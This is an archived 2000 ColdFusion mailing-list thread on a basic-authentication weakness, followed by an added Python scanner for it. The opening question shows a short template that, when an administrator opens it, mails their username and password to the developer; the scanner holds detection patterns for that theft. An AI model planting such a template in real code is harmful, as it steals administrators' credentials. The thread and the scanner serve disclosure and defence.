Steve Bernard wrote:
>> We trust every faceless programmer who works on any software

If you are smart, you also run background checks, pull credit reports, check
references, call former employers, run a drug and tox screen, and check
transcripts. You perform regular audits by internal staff as well as by
outside auditors, you make sure a different division/department is responsible
for physical and computer security, you rotate staff assignments, and you
make sure employees and contractors take regular vacations.

Only then can you trust your admins and developers.

The Russians have a saying, "Trust but verify!"
The Arabs say, "Trust in God but tie your camel."
My favorite is: "Trust everyone till you have a reason not to."

You should use all three.

 - Steve

Steve Pierce, HDL
"Co-Location starting $99 per month, no setup fee"
(734) 482-9682 | mailto:[EMAIL PROTECTED] | http://HDL.com
-----Original Message-----
From: Steve Bernard [mailto:[EMAIL PROTECTED]]
Sent: Saturday, November 04, 2000 10:53 PM
To: CF-Talk
Subject: RE: Security hole in basic authorization... Solutions?


If you can't trust your developers then you need new people. We trust every
faceless programmer who works on any software that we load on our
workstations and servers. We trust consultants not to create backdoors when
brought in, and, in developer shoes, we trust the Admins not to misuse their
power. So, in short, you have to maintain a certain amount of trust, that's
how the world works.

Steve


----- Original Message -----
From: "Jamie Jackson" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Friday, November 03, 2000 11:21 AM
Subject: Security hole in basic authorization... Solutions?

Say I'm a developer, but not a SysAdmin.

It is too easy for me to get an administrator's username/password like
this, using Win2k basic authorization:

Hey, administrator, I'm troubleshooting a template, would you see if
the test passes?:

<html><body>
Test Passed! Thanks, for checking, administrator!
<cfmail to="[EMAIL PROTECTED]" from="[EMAIL PROTECTED]" subject="Got Root!">
#cgi.auth_user#
#cgi.auth_password#
</cfmail>
</body></html>

How do I prevent this from working?

Thanks,
Jamie
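As an added example (not from anyone in this thread), a small Python check that walks CFML templates for reads of cgi.auth_user / cgi.auth_password, the variables the template above relies on, and rates a hit higher when the same file also contains a tag such as <cfmail> that can push data off the server. The template names, addresses and severity labels are constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample templates (not from the original post) to run the check over.
SAMPLE_TEMPLATES = {
    "test.cfm": """<html><body>
Test Passed!
<cfmail to="ops@example.com" from="app@example.com" subject="report">
#cgi.auth_user#
#cgi.auth_password#
</cfmail>
</body></html>""",
    "greet.cfm": "<cfoutput>Hello #cgi.auth_user#</cfoutput>",
    "index.cfm": "<cfoutput>#now()#</cfoutput>",
}

# Matches cgi.auth_password, CGI.AUTH_PASSWORD, cgi["auth_password"], cgi['auth_user'], ...
CRED_RE = re.compile(r"""cgi\s*(?:\.\s*|\[\s*["']\s*)(auth_password|auth_user)""", re.I)
# Tags through which a template can send data somewhere else (mail, HTTP, FTP, files, logs)
EXFIL_RE = re.compile(r"<cf(mail|http|ftp|file|log)\b", re.I)


@dataclass
class Finding:
    path: str
    line: int
    variable: str
    severity: str


def scan_template(path, text):
    """Return one Finding per read of a Basic-auth CGI variable in this template."""
    has_exfil = EXFIL_RE.search(text) is not None
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in CRED_RE.finditer(line):
            var = m.group(1).lower()
            # Reading the password is always high; reading the username next to
            # a tag that can ship it elsewhere is the pattern from the post.
            sev = "high" if var == "auth_password" else ("medium" if has_exfil else "low")
            findings.append(Finding(path, lineno, var, sev))
    return findings


def scan_all(templates):
    """Scan a {path: source} mapping, e.g. built by reading every .cfm under a web root."""
    return [f for path, text in templates.items() for f in scan_template(path, text)]


if __name__ == "__main__":
    for f in scan_all(SAMPLE_TEMPLATES):
        print(f"{f.severity:6} {f.path}:{f.line} reads cgi.{f.variable}")
```

Run over a real tree by replacing SAMPLE_TEMPLATES with the contents of the .cfm files; anything rated high or medium is worth a look in code review before the template goes anywhere an administrator will browse it.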
----------------------------------------------------------------------------
--------------------
Archives: http://www.mail-archive.com/[email protected]/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=sts or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]
